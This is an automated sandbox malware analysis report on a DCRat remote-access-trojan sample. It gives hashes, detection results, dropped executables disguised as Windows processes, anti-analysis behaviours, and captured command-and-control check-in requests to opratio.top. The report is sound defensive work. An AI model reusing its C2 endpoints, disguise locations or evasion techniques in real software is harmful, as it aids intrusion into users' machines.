Windows Analysis Report
JAJL2EYBPH.exe

Overview

General Information

Sample name:	JAJL2EYBPH.exe renamed because original name is a hash value
Original sample name:	0FA3CDB868BD4619A4146D8593BFFF79.exe
Analysis ID:	1417078
MD5:	0fa3cdb868bd4619a4146d8593bfff79
SHA1:	2dfa62bd92603d06d1735bedce6dffa7759b6692
SHA256:	124b0e5e84492c91ce2382751083691b7f3dda71546374289130f730e1349202
Tags:	DCRatexe
Infos:

Detection

DCRat

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected DCRat

Detected VMProtect packer

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Machine Learning detection for dropped file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

File is packed with WinRar

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\3LXAY36iRv.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\rq9fLK5Nyj.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\ZXPLL9zJFP.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\NpnD5G3qEA.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\NqvJKoZOIs.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Windows\twain_32\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\nBqbaEi3SG.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\Vs6Gb3dzjw.bat	Avira: detection malicious, Label: BAT/Runner.IL
Source: C:\Users\user\AppData\Local\Temp\diBg3fIzhe.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950
Source: C:\Users\user\AppData\Local\Temp\g3J0tdP0ue.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\UO0HaVbJ1O.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Users\user\AppData\Local\Temp\v8evR6XBmk.bat	Avira: detection malicious, Label: BAT/Runner.IK
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Avira: detection malicious, Label: HEUR/AGEN.1309950

Multi AV Scanner detection for dropped file

Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	ReversingLabs: Detection: 83%
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	ReversingLabs: Detection: 83%
Source: C:\Recovery\QmitaxvEcgoLLOqeIEyLx.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	ReversingLabs: Detection: 83%
Source: C:\Users\Public\Music\QmitaxvEcgoLLOqeIEyLx.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Virustotal: Detection: 18%	Perma Link
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Virustotal: Detection: 62%	Perma Link
Source: C:\Windows\twain_32\WmiPrvSE.exe	ReversingLabs: Detection: 83%
Source: C:\Windows\twain_32\WmiPrvSE.exe	Virustotal: Detection: 62%	Perma Link

Multi AV Scanner detection for submitted file

Source: JAJL2EYBPH.exe	Virustotal: Detection: 70%			Perma Link
Source: JAJL2EYBPH.exe	ReversingLabs: Detection: 57%

Machine Learning detection for dropped file

Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Joe Sandbox ML: detected
Source: C:\Windows\twain_32\WmiPrvSE.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Joe Sandbox ML: detected

Uses 32bit PE files

Source: JAJL2EYBPH.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\QmitaxvEcgoLLOqeIEyLx.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Common Files\Adobe\296c159f5c41a5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\RuntimeBroker.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	Directory created: C:\Program Files\Windows Sidebar\9e8d7a4ca61bd9	Jump to behavior

Source: JAJL2EYBPH.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: JAJL2EYBPH.exe, work.exe.0.dr
Source:	Binary string: *m.pdb source: WmiPrvSE.exe, 00000009.00000002.1804469408.000000001BB08000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: s\dll\System.pdb$ source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdbB- source: WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdbS-7 source: WmiPrvSE.exe, 00000016.00000002.2034484726.000000001B01C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\System.pdb source: WmiPrvSE.exe, 0000001B.00000002.2158498353.000000001B680000.00000004.00000020.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2262813857.000000001BE64000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: (@dows\dll\System.pdb source: WmiPrvSE.exe, 0000002F.00000002.2553710900.000000001B64C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: m.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B67C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: runas.pdb source: WmiPrvSE.exe, 0000001B.00000002.2157976799.000000001B620000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: WmiPrvSE.exe, 0000003A.00000002.2764366926.000000001B66E000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8BA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00B8BA94
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9D420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00B9D420
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009EBA94 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	3_2_009EBA94
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\work.exe	Code function: 3_2_009FD420 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	3_2_009FD420

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 4x nop then jmp 00007FFD9BACBFCCh		27_2_00007FFD9BACBE8D
Source: C:\Windows\twain_32\WmiPrvSE.exe	Code function: 4x nop then jmp 00007FFD9BADBFCCh		37_2_00007FFD9BADBE8D

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49729 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49736 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49737 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49743 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 138.201.79.103:80
Source: Traffic	Snort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 138.201.79.103:80

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: opratio.topContent-Length: 332Expect: 100-continueConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown

DNS traffic detected: queries for: opratio.top

Source: unknown

HTTP traffic detected: POST /ProviderpipePythonGeoupdateBigloaddownloads.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: opratio.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive

Source: WmiPrvSE.exe, 00000009.00000002.1794790837.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1794790837.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.0000000003797000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002676000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003391000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003977000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.0000000003B67000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003181000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://opratio.top
Source: WmiPrvSE.exe, 0000003F.00000002.2806559544.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://opratio.top/
Source: WmiPrvSE.exe, 00000009.00000002.1794790837.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002676000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003391000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003181000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://opratio.top/ProviderpipePythonGeoupdateBigloaddownloads.php
Source: WmiPrvSE.exe, 00000009.00000002.1794790837.00000000031AA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.0000000003797000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002D37000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002D9A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003977000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.0000000003B67000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002DE9000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003337000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.0000000003397000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.0000000003B67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://parking-exp.regery.net
Source: pfwa.exe, 00000004.00000002.1664894690.000000000348F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1794790837.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000000F.00000002.1906491398.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002B40000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000016.00000002.2023093262.0000000002676000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000001B.00000002.2133894379.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.0000000003391000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000020.00000002.2247284476.00000000037C1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000025.00000002.2369709829.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.00000000039B1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002A.00000002.2439876329.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000002F.00000002.2530032666.0000000002C34000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000003181000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000035.00000002.2603792472.0000000002D6A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003A.00000002.2736236455.0000000002DCA000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.000000000359A000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 0000003F.00000002.2806559544.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

System Summary

Detected VMProtect packer

Source: QmitaxvEcgoLLOqeIEyLx.exe0.4.dr

Static PE information: .vmp0 and .vmp1 section names

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe

Code function: 0_2_00B87AAF: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,

0_2_00B87AAF

Creates files inside the system directory

Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Windows\twain_32\WmiPrvSE.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RarSFX1\pfwa.exe	File created: C:\Windows\twain_32\24dbde2999530e			Jump to behavior

Detected potential crypto function

Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B892C6	0_2_00B892C6
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B95011	0_2_00B95011
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA62A8	0_2_00BA62A8
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B95282	0_2_00B95282
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B902F7	0_2_00B902F7
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B98253	0_2_00B98253
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B913FD	0_2_00B913FD
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BA64D7	0_2_00BA64D7
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B9742E	0_2_00B9742E
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B955B0	0_2_00B955B0
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BAE600	0_2_00BAE600
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B907A7	0_2_00B907A7
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B988AF	0_2_00B988AF
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8D833	0_2_00B8D833
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8395A	0_2_00B8395A
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BAEAAE	0_2_00BAEAAE
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B84A8E	0_2_00B84A8E
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00BB2BB4	0_2_00BB2BB4
Source: C:\Users\user\Desktop\JAJL2EYBPH.exe	Code function: 0_2_00B8FCCC	0_2_00B8FCCC
